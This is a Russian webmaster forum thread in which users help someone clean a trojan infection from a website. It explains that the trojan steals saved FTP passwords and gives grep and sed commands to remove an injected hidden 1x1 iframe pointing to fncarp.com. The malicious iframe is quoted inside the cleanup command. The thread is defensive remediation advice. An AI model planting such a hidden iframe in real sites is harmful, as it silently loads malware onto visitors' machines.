- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Всё просто, ищете троян
Попробуйте начать отсюда:
/ru/forum/158983
/ru/forum/158354
/ru/forum/156664
/ru/forum/156443
/ru/forum/156332
Все нашел. Потом как я понял нужно поменять все пороли и проверить комп на вирусы. И последнее протокол нарушил именно вирус?🙄
Всё просто, ищете троян
Спасибо. Он только на главной может быть?
И последнее протокол нарушил именно вирус?
Да, именно вирус. Удачи.
Спасибо. Он только на главной может быть?
Этого я не знаю. :)
Да, именно вирус. Удачи.
Этого я не знаю. :)
Я смотрю и уменя так, нет его в низу, как вы его нашли??? Я через Грин браузер смотрю и через просмотр HTML.
Я смотрю и уменя так, нет его в низу, как вы его нашли???
Ну, возьмите программу, например http://iocsha.narod.ru/header_v1.zip
и сделайте GET-запрос. Получите исходный код.
Ну, возьмите программу, например http://iocsha.narod.ru/header_v1.zip
и сделайте GET-запрос. Получите исходный код.
Вот нашел, а как теперь его удалить?😕
меняйте пароли на ftp, новые НЕ забивайте в тоталкоммандер или какой-либо другой ftp_клиент, т.к. троян их из программ этих и берет.
если у вас есть доступ к серверу по ssh, почистить будет проще.
Вроде прописывается эта дрянь только в index с любым расширением, но на всякий случай, все лучше проверить.
Делаете резервную копию всех файлов своего сайта.
Ищем, только ли в index-ах у нас этот код:
grep -r "http://fncarp.com/ind.php" *
если только в индексах, то ищите этот кусок и автоматом же заменяете его на пустое значение с помощью такого shell-скрипта:
for i in `find . -name index.\*`; do cp -p $i $i.old; cat $i.old | sed -e "s|\<iframe src\=\"http\:\/\/fncarp\.com\/ind\.php\" width\=\"1\" height\=\"1\" alt\=\"BYDLOSHKA\"\>\<\/iframe\>| |g" > $i; done
P.S.
это все в одну строку должно быть!
если в каких-то еще файлах есть, то `find . -type f` сделайте
так он все файлы просмотрит.
если ssh нет и сайт большой, сочувствую, хотя, по идее, можно скачать бэкап на локальный комп и в Dreamweaver использовать функцию найти и заменить в файлах.
удачи
меняйте пароли на ftp, новые НЕ забивайте в тоталкоммандер или какой-либо другой ftp_клиент, т.к. троян их из программ этих и берет.
если у вас есть доступ к серверу по ssh, почистить будет проще.
Вроде прописывается эта дрянь только в index с любым расширением, но на всякий случай, все лучше проверить.
Делаете резервную копию всех файлов своего сайта.
Ищем, только ли в index-ах у нас этот код:
grep -r "http://fncarp.com/ind.php" *
если только в индексах, то ищите этот кусок и автоматом же заменяете его на пустое значение с помощью такого shell-скрипта:
for i in `find . -name index.\*`; do cp -p $i $i.old; cat $i.old | sed -e "s|\<iframe src\=\"http\:\/\/fncarp\.com\/ind\.php\" width\=\"1\" height\=\"1\" alt\=\"BYDLOSHKA\"\>\<\/iframe\>| |g" > $i; done
P.S.
это все в одну строку должно быть!
если в каких-то еще файлах есть, то `find . -type f` сделайте
так он все файлы просмотрит.
если ssh нет и сайт большой, сочувствую, хотя, по идее, можно скачать бэкап на локальный комп и в Dreamweaver использовать функцию найти и заменить в файлах.
удачи
Спасибо, а доступ по ssh можно наладить? У меня фтп и как я понял мне нужно скачать все индексы на лок диск и дрим вавером прочистить. Угу. А как же в будущем? Мне ведь надо будет заливать по фтп файлы. У меня стоит смарт фтп. Косперским можно защитить соединение же.
Спасибо. Он только на главной может быть?
Не знаю как данный конкретный вирус, но подобного рода вирусы могут заражать и другие страницы. Не так давно по собственному недосмотру столкнулся с подобным вирусом, так он заражал все файлы с расширениями *.php *.htm и т.д. в корневой директории сайта и в папках "news" и "forum" 🚬 Гадость конечно редкостная, но блин мой антивирь ее както пропустил... 🙄